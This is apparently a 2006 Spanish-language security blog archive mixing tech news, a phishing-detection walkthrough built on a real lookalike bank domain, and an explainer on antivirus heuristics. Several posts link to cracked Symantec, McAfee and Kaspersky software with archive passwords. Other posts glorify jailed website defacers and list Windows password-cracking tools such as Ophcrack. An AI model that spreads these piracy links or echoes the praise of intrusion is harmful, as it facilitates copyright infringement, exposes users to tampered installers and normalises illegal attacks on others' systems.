C4 Instant Messaging
C5. Media Players
C6. DNS Servers
C7. Backup Software
C8. Security, Enterprise, and Directory Management Servers

Network Devices
N1. VoIP Servers and Phones
N2. Network and Other Devices Common Configuration Weaknesses

Security Policy and Personnel
H1. Excessive User Rights and Unauthorized Devices
H2. Users (Phishing/Spear Phishing)
Special Section
Z1. Zero Day Attacks and Prevention Strategies

Finalmente destacar que en el apartado de sistemas operativos, Windows vuelve a ganar por goleada:

W1. Internet Explorer
W2. Windows Libraries
W3. Microsoft Office
W4. Windows Services
W5. Windows Configuration Weaknesses
M1. Mac OS X
U1. UNIX Configuration Weaknesses

Fuente:
http://www.sans.org/top20

Vulnerabilidad en Firefox ayuda a revelar contraseñas

2006-11-29T11:44:00.000-08:00

Acaba de ser descubierta una grave vulnerabilidad en la versión estable de Firefox que puede ser empleada para desvelar las contraseñas de sus usuarios.
La vulnerabilidad posibilita la aparición de un nuevo tipo de ataque, que sus descubridores han bautizado como vulnerabilidad RCSR (Reverse Cross-Site Request).

El ataque RCSR también funciona sobre Internet Explorer, aunque la vulnerabilidad descubierta en Firefox, hace a estos usuarios especialmente vulnerables.

La vulnerabilidad es bastante grave dado que puede afectar a cualquier visitante de weblog o foro que permita a sus usuarios incluir código HTML en sus mensajes.
Es por ello que sus descubridores recomiendan la especial atención de webmasters y administradores de foros, con los códigos HTML que permiten en sus mensajes.

Desde la Fundación Mozilla ya han anunciado que la vulnerabilidad estará resuelta en la próxima versión de Firefox, la 2.0.1 o 2.0.2.

Hasta que no salga la nueva versión se recomienda desactivar el gestor de contraseñas.
A continuación un enlace al artículo original y una prueba de concepto de la vulnerabilidad.

CIS Finds Flaws in Firefox v2 Password Manager.
Prueba de concepto de la vulnerabilidad

Sun esta Regalando su Solaris 10 y lo envia a las Casas

2006-11-29T11:37:00.000-08:00

Sun siguiendo la EXITOSA campaña de CANONICAL ha decidido regalar su Solaris 10 y enviarlo de forma gratuita por correo hasta las casas de los usuarios.

Recuerden que solaris permite ejecutar aplicaciones GNU/Linux sin realizar modificaciones, por lo que el porta folio de programas es bien amplio.

RECIBIR SOLARIS 10 EN CASITA Y DE GORRA!!

LSD EN FORMA DE WEB

2006-11-29T05:43:00.000-08:00

Acabo de ver el sitio mas tripi que he visto nunca via meneame, es del creador de los teletubbis o como se llamen
lo mas chungo es que es tan adictivo como los tripis xD

LINK

F-18 ROMPIENDO BARRERA DEL SONIDO

2006-11-29T05:15:00.000-08:00

Se que este tema no va de seguridad informatica pero me parecio muy interesante asi que en este video se muestra como un F-18 rompe la barrera del sonido, impresionante!!

Fuente

Dia Internacional De La Seguridad De La Informacion

2006-11-29T04:25:00.000-08:00

Segun veo por la red, hoy empezo el dia DISI (dia internacional de la seguridad de la informacion) segun leo se celebra en madrid entre los dias 29 y 30 de noviembre en la universidad politecnica de madrid, yo asistire o lo intentare mañana dia 30 hay mejores ponencias.

Horario Congreso

Nueva Web Cannabica!!

2006-11-27T19:03:00.000-08:00

He creado una nueva web llamada LaBibliaDelFumeta.Com os animo ha que la visiteis, os guste o no el tema del cannabis pasareis un buen rato, os lo aseguro. xD

PD: Se buscan colaboradores.

COMO EVITAR PHISING [MUESTRA DE CASO REAL]

2006-11-27T16:48:00.000-08:00

Hace unos dias me puse a mirar un antiguo correo que tenia y me sorprendió algo, al entrar me encontre además de con los millones de correos basura (SPAM) con un bonito email.

Dicho email que podéis ver a vuestra derecha era remitido supuestamente por cajamadrid un banco de españa, si algún día escribo mis memorias hablare sobre una etapa de mi vida en la que me sumergí en un mundo no muy recomendable el mundo del phising, gracias a esto se diferenciar perfectamente un intento de estafa, ya que yo me he movido en ese mundo.

Como evitar que nos hagan Phising.

1ºEl atacante usara la ing.social, eso quiere decir que solo con sus palabras conseguirá que usted haga lo que el realmente quiere.

En este caso el atacante se hace pasar por la entidad financiera cajamadrid y me induce a entrar a una dirección web para ello se hace uso de este código de programación:

href="http://oi.cajamaadrid.com/CajaMadrid/oi/pt_oi/Login" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
https://oi.cajamadrid.es/CajaMadrid/oi/pt_oi/Login/login

Con este code consigue que nosotros visualicemos este link que a simple vista parece correcto.

http://oi.cajamadrid.com/CajaMadrid/oi/pt_oi/Login

Cuando en realidad hace que el navegador nos envíe a esta otra dirección que es donde esta alojado su scam, el scam es el clon con el que nos engañara, es igual que la pagina real de su banco pero esta alojada y controlada por el estafador y así conseguirá hacerse con nuestros datos personales fácilmente

http://oi.cajamaadrid.com/CajaMadrid/oi/pt_oi/Login

Como se puede apreciar fácilmente el segundo link (el malo) tiene la peculiaridad de que en la palabra cajamaadrid tiene dos letras a , eso ha simple vista puede parecer un fallo o simplemente no visualizarse, pero gracias a ese fallo esa dirección es distinta a la original.

2ºJamás habrá dos direcciones iguales en la red, esto quiere decir que las direcciones siempre serán así:

Protocolo / Dominio
http:// / oi.cajamaadrid.com

Nota: Jamás habrá 2 dominios iguales.

3º Los estafadores o Carders, se valdrán de astutas técnicas para confundir su ignorancia por ejemplo el uso de terceros niveles de dominio eso quiere decir que pueden incluir palabras detras de un dominio.

EJEMPLO

Las técnicas de los carders o estafadores son muchas una de ellas es esta, si se quiere estafar a cajamadrid por ejemplo se podría conseguir un dominio llamado servidor1.com luego se procedería a crear un tercer nivel llamado cajamadrid, esto quedaría así:

http://cajamadrid.servidor1.com
Con este dominio seria mucho mas fácil que usted confiara en la autenticidad de esa dirección.

En menos de 1 minuto y fácilmente había comprobado que realmente se trataba de un intento de estafa hacia mi persona ni siquiera se habían molestado en currarse el protocolo https para aparentar algo mas, eso dejaba claramente a la vista que el o los atacantes eran la tipica "gentecilla" que no tiene mucho "arte" y que solo va a lo fácil que en este caso son los usuarios sin muchos conocimientos en seguridad informática que son mas del 70%.

4º Intentaran engañarle usando las mimas imagenes que su banco original, como se puede apreciar en la foto usan el logotipo alojado en los servidoresdel banco real.

Rapidamente decidí indagar mas sobre mi estafador, ya sabia que el dominio desde el que trabajaba era http://cajamaadrid.com y que había usado la técnica del tercer nivel de dominio tal que así http://oi.cajamaadrid.com me fui directo ha hacerle un whois, eso quiere decir que haces una busqueda en la base de datos mundial de dominios para saber algo mas sobre cuando se contrato ese dominio cuando expira con que empresa etc, y me soltó esta información:

Domain Name: CAJAMAADRID.COM
Registrar: NAMEKING.COM, INC.
Whois Server: whois.nameking.com
Referral URL: http://www.nameking.com
Name Server: NS3.CHESTERTONHOLDINGS.COM
Name Server: NS33.CHESTERTONHOLDINGS.COM
Status: REGISTRAR-LOCK
EPP Status: clientTransferProhibited
Updated Date: 25-Nov-2006
Creation Date: 10-Aug-2006
Expiration Date: 10-Aug-2007

-Datos importantes
Empresa donde el estafador compro el dominio: nameking.com, es interesante por que la compra la habra echo con una tarjeta de crédito de otra persona por lo que sera difícil saber quien ha sido, miraran las conexiones y seguramente les saldrá un proxi de México o de donde sea.

Bueno con estos datos puedes hacer 2 cosas llamar a la poli y darle esos datos, en pocos minutos y casi sin esfuerzo cerraran la web, la segunda cosa que puedes hacer es darme las gracias por haber leido este faaaaantastico articulo echo por mi xD ya que gracias a este texto jamás te aran phising.

RECORDAR:

1ºEl atacante usara la ing.social, eso quiere decir que solo con sus palabras conseguirá que usted haga lo que el realmente quiere.

2ºJamás habra dos direcciones iguales en la red.

3º Los estafadores o Carders, se valdrán de astutas técnicas para confundir su ignorancia por ejemplo el uso de terceros niveles de dominio eso quiere decir que pueden incluir palabras detras de un dominio.

4º Intentaran engañarle usando las mimas imagenes que su banco original, como se puede apreciar en la foto usan el logotipo alojado en los servidoresdel banco real.

5º Recuerde esto es lo mas importante, nunca jamás ningún banco,empresa,asociación o loquesea le pedira ningún tipo de información privada sobre usted.

Bueno esto es todo espero que os aya gustado otro dia os enseño como saber de que servidor nos han enviado el email (SPAM) y a raiz de eso llegar hasta la direccion del pc, aunque seguramente ese sistema halla sido hackeado para spamear y el tipo este en cancun!! pero esa es otra historia.... xD

PD: Perdonar por las faltar ortograficas, no tenia mucho tiempo para escribir.

Symantec 2006 AIO

2006-11-25T23:07:00.000-08:00

Descargar:

http://rapidshare.de/files/12699207/TEU_SYMANTEC_2006.part01.rar.html

http://rapidshare.de/files/12702411/TEU_SYMANTEC_2006.part02.rar.html

http://rapidshare.de/files/12706310/TEU_SYMANTEC_2006.part03.rar.html

http://rapidshare.de/files/12709650/TEU_SYMANTEC_2006.part04.rar.html

http://rapidshare.de/files/12712418/TEU_SYMANTEC_2006.part05.rar.html

http://rapidshare.de/files/12715166/TEU_SYMANTEC_2006.part06.rar.html

http://rapidshare.de/files/12717879/TEU_SYMANTEC_2006.part07.rar.html

http://rapidshare.de/files/12720358/TEU_SYMANTEC_2006.part08.rar.html

http://rapidshare.de/files/12722413/TEU_SYMANTEC_2006.part09.rar.html

http://rapidshare.de/files/12695997/TEU_SYMANTEC_2006.part10.rar.html

PASS: FRTK_TEAM_2006

McAfee 2007 Full - Cracked

2006-11-25T23:04:00.000-08:00

DOWNLOAD

Nettoxic, liberado pero no podrá acercarse a un PC

2006-11-25T22:55:00.000-08:00

Pese a infringir la ley de Delitos Informáticos, Carlos Amigo y Leonardo Hernández quedaron en libertad, pero deberán cumplir medidas cautelares, entre ellas la de no acercase a un PC. La medida fue dictada por la Cuarta Sala de la Corte de Apelaciones de Santiago, este miércoles 15 de noviembre. Los dos jóvenes hackers fueron arrestados el 6 de noviembre, luego de haber intervenido diversos sitios WEB de importancia. Entre ellos cuentan las páginas de los gobiernos de Perú y Venezuela, y el website de la NASA. Una de las medidas cautelares más insólitas es la prohibición total de acercarse a un computador. Además, deben firmar diariamente en el Ministerio Público y quedaron con arraigo nacional. La investigación la lleva el Octavo Juzgado de Garantía, que había denegado la libertad a estas dos personas. No obstante, luego de una apelación de la defensa la Corte de Apelaciones determinó que ambos hackers podían recuperar su libertad. De esta manera, el 14 de noviembre Hernández fue dejado en libertad, mientras que Amigo recibió ese beneficio este miércoles 15. Los jóvenes estaban considerados como los terceros hackers más peligrosos del mundo, ya que hasta la fecha habían intervenido más de dos mil 800 páginas en Internet.

La verdad me hace cierta gracia el tema de condenar a alguien a no poder tocar mas 1 pc, como es eso, tendra a alguien las 24h detras suya?, le acompañaran a mear?, habra alguien ayi para decirle NO si intenta conectarse via movil a la red WAV?, habra alguien en su casa para vigilar que no se conecte al wify del vecino? en fin

PD: HACKERS 1 GOBIERNO 0

Cambiar Texto Inicio

2006-11-08T11:33:00.000-08:00

Aqui os dejo un programita para que podais cambiar el texto de vuestro boton de inicio como se muestra en las imagenes.

Descargar

Una victima mas del estado

2006-11-06T09:50:00.000-08:00

Larga muy larga es la lista de encarcelados ya por el grandioso y querido por casi todos, me refiero a "El Estado", Chavales que sin animo de lucro y buscando unicamente su superacion intelectual penetran en servidores dejando su pequeña huella, los mejores no destruyen, no dañan ningun tipo de informacion, aun asi son encarcelados con altas penas de carcel cuando su unico delito ha sido el de su propia superación, si señores y señoras en pleno siglo XXI el gobierno encarcela a gente que simplemente es un peligro para el, y ese peligro no es por construir armas de destruccion masiva, ni por entrenar guerrilleros, no, no señores ese peligro biene dado simple y unicamente por ser mas inteligente que los empleados del gobierno.

Acabo de conectarme a la red, desde hace algun tiempo y por problemas ajenos ami, no he podido conectarme y cual sorpresa la mia cuando alguien me dice por el Messenguer:

Alguien dice:
Hey Overrayd que tal cuanto tiempo, han pillado a Nettoxic lo sabes?
Overrayd dice:
No, no tenia ni idea cuando ha sido
Alguien dice:
Miralo tu mismo
http://www.emol.com/noticias/nacional/detalle/detallenoticias.asp?idnoticia=235123

En Rancagua y Santiago cayó banda de hackers que intervino página de la NASA

Cerca de las 5:20 horas de la mañana, la Brigada del Cibercrimen de la Policía de Investigaciones comenzó diversos operativos en Santiago y Rancagua para dar con el paradero de la tercera banda de hackers más importante de Latinoamérica, diligencias que ya suma cuatro detenidos.

En un allanamiento realizado en la villa "El Teniente" de Rancagua se detuvo a Leonardo Hernández Salas (23 años), quien responde al seudónimo de "NeTToxic", y de quien se sospecha que tiene un importante rol en la banda. Además se incautó el computador que empleaba para sus infiltraciones y otros equipos computacionales.De acuerdo a los antecedentes entregados por la brigada del Cibercrimen, "NeTToxic" es requerido por otros países.En sus primeras declaraciones tras ser detenido, el hacker rancagüino señaló que esto sólo lo hace por hobby y no con fines lucrativos, por lo que descarta haberse infiltrado en algún sitio web para robar dinero o datos que le sirvieran para este fin.

En fin Leonardo Hernández Salas o Nettoxic como yo tuve el placer de conocerle y compartir intereses durante bastante tiempo por la red no se ha manchado en bano, el sera uno mas de los valientes que se han atrevido a luchar contra el gobierno, todos ellos son los buenos de esta pelicula, aun que ahora sean tratados como terroristas por este gobierno al que todos aman y obedecen, yo se que en un futuro lejano la historia les recordara como unos grandes soldados caidos en batalla o unos buenos chavales mas inteligentes que los demas y que preferian quedarse en casa estudiando, aprendiendo y enseñando ha estar robando, drogandose o matando por la calle.

Viva Nettoxic

Viva los hackers

Viva la red

Viva la libertad

Hacking Tool: Burp suite v1.0

2006-10-24T08:21:00.000-07:00

Burp Suite es una plataforma integrada para atacar aplicaciones web. Esto contiene todos los instrumentos de Burp (proxy, spider, intruder and repeater) con numerosas interfaces entre ellos, diseñado para facilitar y acelerar el proceso de atacar un sitio web.Burp Suite permite a un atacante,combinar técnicas manuales y automatizadas para enumerar, analizar, atacar y explotar aplicaciones web.

Varios instrumentos de Burp trabajan juntos con eficacia para compartir la información y permitir conclusiones identificadas dentro de un instrumento para formar la base de un ataque.

windows & linux
Download Archivo .zip
Download Archivo .tar.gz
Modo de Uso: Help

AIO security 2006

2006-10-24T08:12:00.000-07:00

Super AIO security 2006

Aqui teneis un buen pack de utilidades para vuestra seguridad, totalmente crackeadas y en 4 partes.

DOWNLOAD

password unrar : tqk-tvk

Internet Explorer 7 Bug Nº1 Felicidades!!

2006-10-24T08:01:00.000-07:00

Hablar de bugs en Internet Explorer es como hablar de las victorias de Fernando Alonso en la Formula 1, todo el mundo sabe de ellas y ya pocos quedan impresionados, pero he aqui la primera vulnerabilidad de la ultima version de este pobre navegador llamado Explorer.

Secunia ha informado de una vulnerabilidad que permite mostrar información sensible del usuario de la máquina, debido a un error en el manejo de las redirecciones. El atacante ’solo’ puede acceder a documentos que tengas en la cache de visitar otras webs. Le han puesto una calificación de gravedad de 2/5.
Lo desesperante es que Thomas Kristensen (CTO de Secunia), afirmó que ‘ya habia información sobre esta vulnerabilidad hace seis meses, y permite a páginas maliciosas consultar el contenido de otros sitios que no han sido actualizados’.
Si algún ‘aventurero’ ya lo tiene instalado y funcionando, puede probar la demostración.

Fuente: Secunia

Los hackers aprenden a camuflar el código de sus ataques

2006-10-19T02:20:00.000-07:00

Un grupo de hackers están desarrollando un nuevo tipo de software que esconde el código de sus ataques a las compañías de seguridad. El software, denominado VoMM (eVade o’ Matic Module), utiliza diversas técnicas para combinar el código de varias vulnerabilidades, de forma que las soluciones antivirus no sean capaces de reconocerlo. Al utilizar estas técnicas, VoMM “puede crear un número ilimitado de variantes de la vulnerabilidad”, asegura Aviv Raff, uno de los desarrolladores que se encuentran detrás del proyecto.

El software utiliza tecnología tecnología de script del lado del servidor para crear nuevas versiones de la vulnerabilidad, que después se lanzan a los usuarios del navegador cuando visitan el sitio web del atacante Al realizar cambios cosméticos al código que no afectan su funcionalidad, VoMM crea una nueva versión del software malicioso que no puede ser detectado por técnicas basadas en firma.

Los productos antivirus basados en firma analizan malware conocido y después crean una huella digital que permite al software antivirus identificar código malicioso. Al añadir componentes extra –etiquetas y espacios, comentarios al azar y nombres variables- que no están incluidos en las firmas conocidas, VoMM crea software que puede eludir su detección.Se espera que el código VoMM se incluya en un nuevo módulo de la versión 3.0 de la conocida herramienta de hackeo Metasploit.

Fuente:http://www.idg.es

Como funciona la Licencia Creative Commons

2006-10-18T11:37:00.000-07:00

Desde hace algun tiempo la red no es la misma desde que nacio este tipo de licencia aqui teneis algo de teoria:

http://es.wikipedia.org/wiki/Creative_Commons

Flash donde se os explica muy bien de que va este tipo de licencia:

http://cyber.law.harvard.edu/blogs/gems/ion/secreativo.swf

Os recomiendo a todos registrar todos vuestros trabajos bajo esta licencia.

Un saludo

10 razones para no usar linux

2006-10-18T11:32:00.000-07:00

Esta es una recopilación de las diez razones fundamentales por las que nadie en el mundo debería utilizar Linux, ya sabeis, ese sistema operativo que según algunos es complicadísimo y cuesta tanto trabajo instalar.

1 - Si usas Linux no tendrás que reiniciar el ordenador cada vez que instales un dispositivo, programa, actualización o similares. Notarás la ausencia de esos puntos muertos porque te perderás la oportunidad de hacer otra cosa que no sea utilizar el ordenador.

2 - No volverás a ver el mensaje “Se recomienda cerrar todas las aplicaciones antes de continuar” ya que en Linux no es necesario, ¿qué seguridad nos aporta esto?.

3 - No es necesario actualizar (normalmente tampoco instalar) periódicamente el antiVirus o antiSpyware. Lamentablemente, tendrás que buscar otra forma de gastar el dinero. Y si el antivirus es pirata ya no podrás alardear ante nadie de que has pirateado la última versión de tu antivirus favorito.

4 - Ya no podrás gastar ingentes cantidades de dinero en programas. Y tampoco podrás piratearlos. Linux viene con muchas, muchísimas aplicaciones para hacer casi cualquier cosa que puedas imaginar. No verás mucho software para Linux en las tiendas porque seguramente viene ya en tus CD de instalación o lo puedes descargar libremente de Internet.

5 - Dejaras de buscar “Acuerdo de licencia para el usuario final” o claves para instalar los programas. Simplemente no existen. Esto provocará que no tengas que descargar parches de páginas de dudosa fiabilidad, lo que conlleva que tu sistema no estará en peligro a cada instante.

6 - Autoconfiguración. Si hay driver para tu memoria USB, disco externo, o impresora simplemente enchúfalo y empezará a funcionar. Olvídate de buscar la última version de driver, reiniciar y todo eso. Con lo bien que se lo pasa uno instalando los CDs de los drivers e instalando el pesado software que les acompaña.

7 - Olvidate de tu “PC Doctor” favorito. Instalar 40000 aplicaciones no ralentiza el sistema, ni unas librerias corrompen las de otro programa que acabas de instalar. Tambien puedes desinstalar una aplicacion estando seguro de que no vas a romper otra aplicación de depende de no-se-que-otra libreria.

8 - Defragmentación de disco. Simplemente no es necesario. ¿Y ahora en qué pierdo yo el tiempo?

9 - En el menú de inicio encontraras las aplicaciones que instalas clasificadas de forma lógica en categorias, no todas en un enorme menú con flechitas para examinar. Esto provocará que encuentres rapidamente lo que buscas y que tengas siempre todo a mano.

10 - Tu ordenador es tuyo. Nadie te va a obligar a pagar para que actualices a una nueva version de tu reproductor de música. Nadie va a obligarte a que te conectes a sus servidores para verificar todo tu software y ninguna información sera enviada a ningun servidor de ninguna gran (enorme) compañia. ¿Dónde está la gracia? Que antigüo parece Linux.

Asi que ya sabeis chavales a no usar linux xD

VideoTutoriales LINUX

2006-10-18T11:20:00.000-07:00

Tras recibir varios mensages sobre usar linux de amigos y conocidos he decidido dejaros unos muy buenos videotutoriales sobre dicho sistema operativo.

Antes de nada debeis aprender algo de teoria:

http://es.wikipedia.org/wiki/Linux

Videos linux:

1.Cuestionario preliminar.avi
2.Introduccion a escritorio GENOME.avi
3.Trabajar con ventanas.avi
4.La barra de tareas.avi
5.Entorno del sistema.avi
6.Cuestionario leccion12.avi
7.Manejo de barras.avi
8.Archivos y carpetas.avi
9.Montaje de discos y cd-rom.avi
10.Crear carpetas.avi
11.Presentacion de los archivos.avi
12.Buscar archivos.avi
13.La papelera.avi
14.simulacion.avi
15.Cuestionario leccion 13.avi
16.Personalizacion del entorno.avi
17.Sonidos asociados al sistema.avi
18.Combinaciones de teclas.avi
19.Tema.avi...(creanme estan las 50 XD)

Download ;-)
http://www.4shared.com/file/4606775/16f1d338/videos_flash_linux.html

Pack Scanners Online

2006-10-10T10:04:00.000-07:00

Aqui teneis un buen pack de servicios de scaneo online, las mejores empresas suelen ofrecer estos servicios en sus webs scanners de virus,troyanos,spyware etc, aqui teneis este pack que reune los mejores en 1 descarga. Disfrutarlo.

Download

Nmap Grafico

2006-10-10T10:00:00.000-07:00

Fruto del programa Summer of Code 2006 de Google Code acaba de ver la luz uno de los desarrollos alrededor de nmap que han sido becados este año: UMIT (antes llamado NmapFE++), un nuevo front end para nmap escrito en Phyton y que usa las GTK. El anuncio oficial de Adriano Monteiro, el autor, aquí.
La instalación es muy sencilla. Las dependencias están bien explicitadas (aunque no vendría de más decir que las distutils de python, necesarias para la instalación, vienen desde hace tiempo sólo con el paquete python-devel en la mayoría de las distribuciones) y el script de instalación va como una seda.

El interfaz del programa es cómodo y muy intuitivo. Cuenta con un ‘wizard’ con dos niveles (novatos o usuarios experimentados) que te permite construir el comando que necesitas sin tener que recordar las decenas de opciones que posee nmap, permite lanzar comandos previamente definidos y comparar los resultados entre distintas sesiones y disponemos tanto de la salida original de la herramienta (pero con ’sintaxis iluminada’ para una mayor comprensión) como de salidas filtradas y decoradas con iconos para que resulten más intuitivas.
Existe un blog asociado al proyecto aunque imagino que se seguiran dando novedades del mismo a través de las listas de Nmap Hackers y Nmap Developers.

Google compra YouTube

2006-10-10T09:33:00.000-07:00

Leo en Diarioti:

Los insistentes rumores de las últimas semanas demostraron ser fidedignos. Google ha comprado el controvertido servicio de vídeo en línea YouTube.

En un comunicado, Google informa haber pagado 1,65 mil millones de dólares por YouTube. "YouTube ha creado una plataforma audiovisual interesante y potente, que complementa la misión de Google de organizar la información del mundo, haciéndola universalmente usable y disponible. Nuestras compañías tienen valores comunes. Nuestra prioridad son los usarios", escribe Google.
Aunque YouTube y Google tienen la misma filosofía, Google no tiene planes de fusionar sus servicios. Tanto YouTube como el servicio Google Video continuarán funcionando de manera independiente. Con la compra de YouTube, Google detiene inicialmente una serie de especulaciones sobre el futuro de YouTube. Varios expertos han comentado que YouTube es una bomba de tiempo que en cualquier momento puede estallar. Con ello se refieren a las posibles demandas que puedan surgir contra el servicio debido a que sus usuarios suelen publicar material con derechos reservados.

Y es que se hacercan grandes cambios a la red de redes, si os soy sincero yo ya veia venir este momento, pensar que lo que conocemos como internet en un principio fuen creado por y para objetivos militares nadie penso que internet llegaria donde ha llegado y por eso aun debe evolucionar muchisimo mas, el futuro de la red sin duda es el web 2.0, paginas dinamicas y tridimensionales con mucho videocontenido y totalmente ajustable al usuario.

Otellini presenta prototipo de procesador de 80 núcleos

2006-09-28T09:52:00.000-07:00

Intel ha creado un prototipo de procesador con asombrosos 80 núcleos. En comparación, los actuales procesadores más avanzados de la compañía cuentan con 2 núcleos.

Para demostrar la forma en que la Ley de Moore seguirá teniendo vigencia con un potencial sorprendente en el futuro, Otellini mostró en una oblea un nuevo prototipo de procesador de investigación con 80 núcleos de punto flotante simples. La oblea de tan sólo 300 mm² es capaz de alcanzar un teraflop de desempeño, o un 1 billón de operaciones de punto flotante por segundo. Otellini comparó esto con el hito histórico de Intel hace 11 años cuando presentó el primer súper computador del mundo en el orden de los teraflops, una máquina masiva con casi 10.000 procesadores Pentium Pro alojados en más de 85 gabinetes que ocupaban unos 2.000 pies cuadrados de espacio.

Fuente

KasperSky 2006 Todo en Uno!!!!

2006-09-27T18:30:00.000-07:00

Incluye:

KasperSky Antivirus V6.0
KasperSky Internet Security 2006
Kaspersky Anti-Hacker
Kaspersky Free Cleaner 12.0.0.7

Download

Download

Download

Herramientas para Recuperar la Contraseña de Windows...

2006-09-27T18:24:00.000-07:00

Ante la consulta de algunos amigos, por problemas con la contraseña de windows, estas son algunas herramientas que servirian para recuperarla, aunque existen de las mas variadas en la red:

AdministratorsPak: Aplicación de pago en el que se incluye a Locksmith, el cual nos permite reemplazar nuestra olvidada contraseña de administrador por una nueva.

Austrumi: Una pequeña distribución de linux cuya imagen ISO pesa 50 MB y que una vez hayas grabado en un cd y luego reiniciar tu pc con el cd metido en tu unidad lectora y la bios preparada para arrancar desde el CD, siguiendo unas instrucciones paso a paso, dejarás la contraseña del administrador en blanco y una vez te loguees en el sistema, ya podrás cambiarla.

CIA Comander:De pago, se ejecuta desde el disquetes y entre las funciones te permite cambiar la contraseña.

EBCD – Emergency Boot CD: Aplicación gratuita multiuso, donde no sólo podemos recuperar el MBR, recuperación del sistema en caso de fallos e incluso podemos cambiar la contraseña de cualquier usuario. Tambien booteable.

Offline NT Password & Registry Editor: Herramienta gratuita y booteable desde CD o diskette por el cual podremos resetear la contraseña e incluso habilitar cuentas bloqueadas o inhabilitadas.

Ophcrack: Es una distribución live cd de Ubuntu de 600 MB su imagen que nos permite crackear la SAM de windows y obtener las claves del cualquier usuario.

fuente:genbeta

Curiosidades!

2006-09-27T18:21:00.000-07:00

podemos probar lo siguiente:

Haz click con el botón derecho en el escritorio
Crea un acceso directo (nuevo >> Acceso directo)
En la ubicación pon cualquier ejecutable, por ejemplo: c:\windows\system32\mspaint.exe
Nombra al acceso directo con un nombre como por ejemplo: www.microsoft.com
Inicia el Internet Explorer (IE5 o IE6)
Escribe "www.microsoft.com" en la barra de dirección (sin http://)

mas Info

Ser hackeado "al vuelo"

2006-09-27T18:14:00.000-07:00

Este interesante vídeo, exhibido en el McAfee Avert Labs Day, muestra una así llamada infección al vuelo: un sistema es hackeado simplemente al visitar una web especialmente desarrollada. El atacante instala malware e intenta esconder el ataque del sistema y el software de seguridad. El usuario nunca ve avisos de seguridad...

Microsoft Private Folder 1.0

2006-09-27T18:06:00.000-07:00

Tras debutar siendo un producto disponible exclusivamente para el mercado chino, Microsoft ha puesto a disposición de los usuarios de copias legítimas de Windows XP (es decir, previo test WGA) Private Folder 1.0, una utilidad que crea una nueva carpeta (My Private Folder) cuyo contenido está protegido por contraseña.Muy util para guardar cosas importantes.

Según Microsoft, se trata de "una herramienta útil para proteger tus datos privados de colegas, amigos, niños u otra gente que comparta tu PC o tu cuenta".

Fuente:Kriptopolis

EDIT: Sin embargo si deseas probar esta utilidad sin necesidad de pasar por la validacion de Windows...puedes hacerlo directamente descargando el programa de AQUI o desde el sitio Oficial de Microsoft AQUI

¿Como Funciona la heurística antivirus? (Primera Parte)

2006-09-27T17:49:00.000-07:00

La heurística muchas veces es vista como magia, como esa capacidad que tiene una solución antivirus para clasificar como maliciosa una muestra sin tener consignada una firma específica para la misma. Una técnica “mágica” que permite marcar al software como sospechoso de tener un comportamiento potencialmente malicioso.

Nada mas lejos de la realidad. El principio de la heurística es muy sencillo y fácil de comprender. Otro tema bien distinto es que los algoritmos resultantes sean mejores o peores, que es donde está realmente el quid de la cuestión.

Wikipedia: Se denomina heurística a la capacidad de un sistema para realizar de forma inmediata innovaciones positivas para sus fines.

Heurística en computación
Si tenemos el motor antivirus corriendo y detecta un comportamiento sospechoso, éste pasará a un estado de alerta y nos notificará que la muestra es potencialmente peligrosa. El antivirus no va a estar totalmente seguro del carácter malicioso, puesto que lo ha marcado como sospechoso en función a indicios de comportamiento, y no en función a una firma conocida y con la que existe un 100% de coincidencia. El sistema realiza innovaciones positivas para su finalidad (nuestra salvaguarda) en tiempo real, o al menos, de modo inmediato.

Este análisis de comportamiento sencillito que hemos visto da origen a toda una rama de las ciencias exactas. Las matemáticas heurísticas son complejas, ya que a fin de cuentas tratan de modelizar comportamientos y no realidades claras y directas. La gran mayoría de las veces, los resultados de este tipo de aproximaciones no podrán ser explicadas.

Estas técnicas de reconocimiento inteligente son lo que matemáticamente se conoce como algoritmos exploratorios multivariantes. Veamos qué es cada cosa en esa frase.

* Algoritmo: Modelización matemática de un comportamiento finito, es decir, que tiene un comienzo y un final.
* Exploratorio: Método de observación y análisis que permite, posteriormente, la toma de decisiones.
* Multivariante: Carácter matemático que establece la dependencia de un evento determinado de múltiples factores concurrentes.

En resumen, si la detección heurística de virus es un problema matemático de exploración multivariante que necesita ser modelizado, a través de distintos algoritmos.

Segun Wikipedia:

Firmas Genéricas

Muchos códigos maliciosos son modificados en forma constante por sus autores para crear nuevas versiones. Usualmente, estas variantes contienen similitudes con los originales, lo cual se denomina como una familia de virus. Gracias a las similitudes dentro del código del virus, los antivirus pueden llegar a reconocer a todos los miembros de la misma familia a través de una única firma o vacuna genérica. Esto permite que al momento de aparecer una nueva versión de un virus ya conocido, aquellos antivirus que implementan esta técnica puedan detectarlo sin la necesidad de una actualización.

Reconocimiento de código compilado

Cuando un programa es compilado para poder convertirlo en un archivo ejecutable, la codificación resultante representa instrucciones que se le darán al sistema para realizar ciertas acciones. Las implementaciones de heurística de algunos antivirus utilizan técnicas para reconocer instrucciones comúnmente aplicadas por los códigos maliciosos, y así poder identificar si un archivo ejecutable puede llegar a ser un código malicioso.

Desensamblado

Todo archivo ejecutable puede ser desensamblado con el objetivo de obtener el código fuente del programa en lenguaje ensamblador. La heurística de algunos productos antivirus es capaz de analizar el código fuente de los programas sospechosos con el fin de reconocer en él técnicas de desarrollo que normalmente sean usadas por los programadores de virus y así reconocer un código malicioso nuevo sin la necesidad de una actualización.

Desempaquetamiento

Los programadores de códigos maliciosos suelen usar empaquetadores de archivos con el fin de modificar la “apariencia” del virus a los ojos del análisis antivirus. Empaquetadores como UPX, son ampliamente utilizados para esto. Para evitar ser engañados por un código malicioso antiguo, reempaquetado, los antivirus incluyen en sus técnicas heurísticas métodos de desempaquetamiento con el fin de poder analizar el código real del programa, y no el empaquetado.

La mejor heurística, la más óptima

Por definición, un algoritmo heurístico es aquel que, sin poder obtener certeza de un evento, se pretende aproximar lo máximo a la realidad. Parece por tanto adecuado deducir que el mejor algoritmo heurístico será aquel que, para una actividad determinada, se aproxime más al comportamiento real de los sucesos sometidos a exploración. Los factores de mejora básicos de la optimización son los siguientes:

* Inversión mínima de recursos computacionales
* Minimización de falsos positivos y fallidos verdaderos
* Extensibilidad del modelo a escenarios de alta variabilidad

Evaluaciones Retrospectivas

